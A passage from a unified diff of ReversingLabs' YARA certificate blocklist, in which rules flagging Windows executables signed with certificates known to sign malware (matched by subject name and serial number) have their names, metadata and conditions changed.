"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13656-L13672" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a1aadaded55c8b0d85ac09ba9ab27fefaeec2969cdabaf26ff0c41bf33422ddc" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7710-L7728" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2b1d6f27fb513542589a5c9011e501a9d298282bba6882eac0fc7bf3e6ebb291" score = 75 quality = 90 tags = "INFO, FILE" @@ -19087,22 +38878,22 @@ rule REVERSINGLABS_Cert_Blocklist_654B406De388Ec2Aec253Ff2Ba4C4Bbd : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yijiajian (Amoy) Jiankan Tech Co.,LTD." and pe.signatures[i].serial=="65:4b:40:6d:e3:88:ec:2a:ec:25:3f:f2:ba:4c:4b:bd" and 1398902400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Rada SP Z o o" and (pe.signatures[i].serial=="00:92:72:60:7c:fc:98:2b:78:2a:5d:36:c4:b7:8f:5e:7b" or pe.signatures[i].serial=="92:72:60:7c:fc:98:2b:78:2a:5d:36:c4:b7:8f:5e:7b") and 1605139200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_78D1817Ebcf338B4E9C810F9740A726B : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_45Eb9187A2505D8E6C842E6D366Ad0C8 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "3d0a97a4-c45a-5238-a287-867529b470cb" + id = "1b8390aa-16b9-558b-aee8-e30fc7100af4" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13674-L13690" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "62e59130ef0ac35b17a265bb8bc2031cac6a75c11925ccb21eb4601b8fbe1a63" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7730-L7746" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4ae755e814ae2488d4bd6b8136ab6d78e4809a2ddacb7f88cf1d2b64c1488898" score = 75 quality = 90 tags = "INFO, FILE" @@ -19112,22 +38903,22 @@ rule REVERSINGLABS_Cert_Blocklist_78D1817Ebcf338B4E9C810F9740A726B : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CONSTRUTORA NOVO PARQUE LTDA - ME" and pe.signatures[i].serial=="78:d1:81:7e:bc:f3:38:b4:e9:c8:10:f9:74:0a:72:6b" and 1431734400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BAKERA s.r.o." and pe.signatures[i].serial=="45:eb:91:87:a2:50:5d:8e:6c:84:2e:6d:36:6a:d0:c8" and 1607040000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_45Fbcdb1Fbd3D702Fb77257B45D8C58E : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_56Fff139Df5Ae7E788E5D72196Dd563A : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "6bfd7c1d-2608-5ca0-8e1e-04c73588895a" + id = "4f34fd37-908c-573c-ba53-5ab622589e88" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13692-L13708" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "441e10f49515d75ee9e8983ba4321377fee13a91ca5eeddc08b393136ce8ccfd" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7748-L7764" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4b58c83901605d8b43519f1bc2d4ac8dc10c794f027681378b2bee2a8ff81604" score = 75 quality = 90 tags = "INFO, FILE" @@ -19137,22 +38928,22 @@ rule REVERSINGLABS_Cert_Blocklist_45Fbcdb1Fbd3D702Fb77257B45D8C58E : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Ding Ruan" and pe.signatures[i].serial=="45:fb:cd:b1:fb:d3:d7:02:fb:77:25:7b:45:d8:c5:8e" and 1476662400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Cifromatika LLC" and pe.signatures[i].serial=="56:ff:f1:39:df:5a:e7:e7:88:e5:d7:21:96:dd:56:3a" and 1606435200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4B5D8Ed5Ca011679F141F124 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_E161F76Da3B5E4623892C8E6Fda1Ea3D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c8bc0968-29d0-51a9-8cfe-7c8f447cef3d" + id = "386c81ef-87aa-514e-81d7-dddfb90e0dc2" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13710-L13726" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "39ff0d5fd711524ce181596033d1d51579cd086eb20b87722aebf39623bbaa17" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7766-L7784" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "883545593b48aa11c11f7fa1a1f77c62321ea86067f1ed108dcd00c8c6cd3495" score = 75 quality = 90 tags = "INFO, FILE" @@ -19162,22 +38953,22 @@ rule REVERSINGLABS_Cert_Blocklist_4B5D8Ed5Ca011679F141F124 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="4b:5d:8e:d5:ca:01:16:79:f1:41:f1:24" and 1480644725<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TGN Nedelica d.o.o." and (pe.signatures[i].serial=="00:e1:61:f7:6d:a3:b5:e4:62:38:92:c8:e6:fd:a1:ea:3d" or pe.signatures[i].serial=="e1:61:f7:6d:a3:b5:e4:62:38:92:c8:e6:fd:a1:ea:3d") and 1604966400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_33671F1Bcbd0F5E231Fc386F4895000E : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_9Ae5B177Ac3A7Ce2Aadf1C891B574924 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0863e1ed-7b9c-5a60-82ac-eadc3c23fbd9" + id = "c72b8b2a-3e49-5ac3-ab4d-55b86ce7f061" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13728-L13744" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "9199c8d76e3390ec9038808b4e88b803b3f3d6966af6206d0c9968d9ab673f31" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7786-L7804" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "03ac299459a1aaf2e4a2e62884cd321e16100fee78b4b0e271acdd8a4e32525c" score = 75 quality = 90 tags = "INFO, FILE" @@ -19187,22 +38978,22 @@ rule REVERSINGLABS_Cert_Blocklist_33671F1Bcbd0F5E231Fc386F4895000E : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ALAIS, OOO" and pe.signatures[i].serial=="33:67:1f:1b:cb:d0:f5:e2:31:fc:38:6f:48:95:00:0e" and 1491868800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Kolorit" and (pe.signatures[i].serial=="00:9a:e5:b1:77:ac:3a:7c:e2:aa:df:1c:89:1b:57:49:24" or pe.signatures[i].serial=="9a:e5:b1:77:ac:3a:7c:e2:aa:df:1c:89:1b:57:49:24") and 1608076800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_32Bc299F0694C19Ec21E71265B1D7E17 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_A03Ea3A4Fa772B17037A0B80F1F968Aa : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "fa2302c3-4002-5bf0-812b-45298abbda8d" + id = "cbc0c6ca-fab2-531e-b368-4d3fdc72509f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13746-L13762" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "cb522e3084d382c451a8b040095e75582675f90dbb588e370f2f0054f4c2d14b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7806-L7824" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e2044c6ddb80f3add13dfc3b623d0460ce8e9a66c5a98582f80d906edbbbd829" score = 75 quality = 90 tags = "INFO, FILE" @@ -19212,22 +39003,22 @@ rule REVERSINGLABS_Cert_Blocklist_32Bc299F0694C19Ec21E71265B1D7E17 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="32:bc:29:9f:06:94:c1:9e:c2:1e:71:26:5b:1d:7e:17" and 1474416000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DREVOKAPITAL, s.r.o." and (pe.signatures[i].serial=="00:a0:3e:a3:a4:fa:77:2b:17:03:7a:0b:80:f1:f9:68:aa" or pe.signatures[i].serial=="a0:3e:a3:a4:fa:77:2b:17:03:7a:0b:80:f1:f9:68:aa") and 1608076800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7B75C6B0A09Afdb9787F6Dff75Ae7844 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_333Ca7D100B139B0D9C1A97Cb458E226 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0b34c7ce-fa75-5340-a473-fa87fab93b86" + id = "c2c32499-4b0d-51ad-a10e-1ddd7218df84" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13764-L13780" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8fd125a526b3433fbb8a5c6fa74ce0b0e2de8ff789880c355625d4140cd902a2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7826-L7842" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b3a31a54132fd8ca2c11b7806503207a4197f16af78693387bac56879b5e1448" score = 75 quality = 90 tags = "INFO, FILE" @@ -19237,22 +39028,22 @@ rule REVERSINGLABS_Cert_Blocklist_7B75C6B0A09Afdb9787F6Dff75Ae7844 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yuanyuan Zhang" and pe.signatures[i].serial=="7b:75:c6:b0:a0:9a:fd:b9:78:7f:6d:ff:75:ae:78:44" and 1476662400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FSE, d.o.o." and pe.signatures[i].serial=="33:3c:a7:d1:00:b1:39:b0:d9:c1:a9:7c:b4:58:e2:26" and 1608076800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_167Fd1295B3Bb102Dbb37292C838E7Cd : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_9245D1511923F541844Faa3C6Bfebcbe : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "42cf5f07-4c43-567c-a517-42c898658ab8" + id = "7d4033b8-da1d-55f5-aa80-f96636650633" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13782-L13798" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1cc7d441291fd9c4dc37320d411f94fb362523d47d37ab35c20b3ac9d4cd75cb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7844-L7862" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b965e897b42c39841e663cc144cf6e4a81fc9bcb64ce3a15a7ca021e95866b08" score = 75 quality = 90 tags = "INFO, FILE" @@ -19262,22 +39053,22 @@ rule REVERSINGLABS_Cert_Blocklist_167Fd1295B3Bb102Dbb37292C838E7Cd : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="16:7f:d1:29:5b:3b:b1:02:db:b3:72:92:c8:38:e7:cd" and 1476921600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LEHTEH d.o.o., Ljubljana" and (pe.signatures[i].serial=="00:92:45:d1:51:19:23:f5:41:84:4f:aa:3c:6b:fe:bc:be" or pe.signatures[i].serial=="92:45:d1:51:19:23:f5:41:84:4f:aa:3c:6b:fe:bc:be") and 1607040000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_253Ad25E39Abe8F8Fda9Fcf6 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_2888Cf0F953A4A3640Ee4Cfc6304D9D4 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f09ca101-dd40-54d8-9235-1faf1e774dd4" + id = "75ec52c5-4c59-51d8-bd9b-928c75d3521a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13800-L13816" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1d46ccaa136cd7be30ffbf0eb09eb6485c543ff4bdbe99fa7ea3846841cbd41b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7864-L7880" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a9ee8534d89b8ac8705bb1777718513a28e4531ed398f482f46a72f2760af161" score = 75 quality = 90 tags = "INFO, FILE" @@ -19287,22 +39078,22 @@ rule REVERSINGLABS_Cert_Blocklist_253Ad25E39Abe8F8Fda9Fcf6 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DVERI FADO, TOV" and pe.signatures[i].serial=="25:3a:d2:5e:39:ab:e8:f8:fd:a9:fc:f6" and 1538662130<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Lotte Schmidt" and pe.signatures[i].serial=="28:88:cf:0f:95:3a:4a:36:40:ee:4c:fc:63:04:d9:d4" and 1608024974<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_A9C1523Cb2C73A82771D318124963E87 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_C8Edcfe8Be174C2F204D858C5B91Dea5 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b21365d0-eaff-51da-8b8e-6a6ee75a5b95" + id = "92baa26f-1352-53ed-bb9f-0a632e471dd5" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13818-L13836" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "87e314d14361f56935b7a8fb93468cfaf2c73e16c25d68a61ec80ad9334d3115" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7882-L7900" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b3e6927abfce69548374bfd430a3ae3a1c5a8d05f0f40e43091b4d12025c5b1a" score = 75 quality = 90 tags = "INFO, FILE" @@ -19312,22 +39103,22 @@ rule REVERSINGLABS_Cert_Blocklist_A9C1523Cb2C73A82771D318124963E87 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ULTERA" and (pe.signatures[i].serial=="00:a9:c1:52:3c:b2:c7:3a:82:77:1d:31:81:24:96:3e:87" or pe.signatures[i].serial=="a9:c1:52:3c:b2:c7:3a:82:77:1d:31:81:24:96:3e:87") and 1499731200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Paarcopy Oy" and (pe.signatures[i].serial=="00:c8:ed:cf:e8:be:17:4c:2f:20:4d:85:8c:5b:91:de:a5" or pe.signatures[i].serial=="c8:ed:cf:e8:be:17:4c:2f:20:4d:85:8c:5b:91:de:a5") and 1608076800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_68E1B2C210B19Bb1F2A24176709B165B : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_9Faf8705A3Eaef9340800Cc4Fd38597C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e17bf185-3dfc-5a2f-a87f-525ac0e4084b" + id = "d2988928-4ef3-56bf-a407-f735756c7f81" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13838-L13854" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8e88ad992c58d37ff1ac34e2d9cf121f3bc692ae78c0ad79140974abdec2f317" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7902-L7920" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "66a340f169e401705ba229d2d4548cef1a57bf1d2d320b108d12b2049b063b92" score = 75 quality = 90 tags = "INFO, FILE" @@ -19337,22 +39128,22 @@ rule REVERSINGLABS_Cert_Blocklist_68E1B2C210B19Bb1F2A24176709B165B : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="68:e1:b2:c2:10:b1:9b:b1:f2:a2:41:76:70:9b:16:5b" and 1474502400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Tekhnokod LLC" and (pe.signatures[i].serial=="00:9f:af:87:05:a3:ea:ef:93:40:80:0c:c4:fd:38:59:7c" or pe.signatures[i].serial=="9f:af:87:05:a3:ea:ef:93:40:80:0c:c4:fd:38:59:7c") and 1605744000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_5C88313Bd98Bde99C9B9Ac1408A63249 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0940Fa9A4080F35052B2077333769C2F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "5108fa8f-3fe6-518c-9bae-b1c44a0ec7a8" + id = "358391b7-649b-5792-b4bd-d97b388c5d12" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13856-L13872" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f958e46e00bf4ab8ecf071502bcda63a84265029bc9c72cea1eaaf72e9003a84" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7922-L7938" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "45636ea33751fea61572539fe6f28bccd05df9b6b9e7f2d77bb738f7c69c53a2" score = 75 quality = 90 tags = "INFO, FILE" @@ -19362,22 +39153,22 @@ rule REVERSINGLABS_Cert_Blocklist_5C88313Bd98Bde99C9B9Ac1408A63249 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="5c:88:31:3b:d9:8b:de:99:c9:b9:ac:14:08:a6:32:49" and 1474243200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PROFF LAIN, OOO" and pe.signatures[i].serial=="09:40:fa:9a:40:80:f3:50:52:b2:07:73:33:76:9c:2f" and 1603497600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7A632A6Ecfc6C49Ec1F42F76 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Ea720222D92Dc8D48E3B3C3B0Fc360A6 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "863a109c-034f-5168-9470-8fd4945e6e92" + id = "8415406b-ede8-5404-8208-34eb649f7325" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13874-L13890" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "038badeab61c00476b79684308bf91f8a63716641f2be16fe0a3b25ebd3a9a1e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7940-L7958" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c60e1ccf178f03f930a3bc41e9a92be20df0362f067ed1fcfc7c93627a056d75" score = 75 quality = 90 tags = "INFO, FILE" @@ -19387,22 +39178,22 @@ rule REVERSINGLABS_Cert_Blocklist_7A632A6Ecfc6C49Ec1F42F76 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="7a:63:2a:6e:cf:c6:c4:9e:c1:f4:2f:76" and 1474959780<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CAVANAGH NETS LIMITED" and (pe.signatures[i].serial=="00:ea:72:02:22:d9:2d:c8:d4:8e:3b:3c:3b:0f:c3:60:a6" or pe.signatures[i].serial=="ea:72:02:22:d9:2d:c8:d4:8e:3b:3c:3b:0f:c3:60:a6") and 1608640280<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_F57Df6A6Eee3854D513D0Ba8585049B7 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4743E140C05B33F0449023946Bd05Acb : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b31f73d5-ff9e-5be7-b806-8838ddb5d29d" + id = "f783bad3-f350-5a74-8e3f-5b7220e4de8f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13892-L13910" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "09d5998960fb65eda56cd698c5ff50d87ba7a811cbb128bc7485c0f124e14cba" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7960-L7976" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "69ce1512d7df4926ee2b470b18fbe51a2aa81e07b37b2536617d6353045e0d19" score = 75 quality = 90 tags = "INFO, FILE" @@ -19412,22 +39203,22 @@ rule REVERSINGLABS_Cert_Blocklist_F57Df6A6Eee3854D513D0Ba8585049B7 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "smnetworks" and (pe.signatures[i].serial=="00:f5:7d:f6:a6:ee:e3:85:4d:51:3d:0b:a8:58:50:49:b7" or pe.signatures[i].serial=="f5:7d:f6:a6:ee:e3:85:4d:51:3d:0b:a8:58:50:49:b7") and 1277769600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "STROI RENOV SARL" and 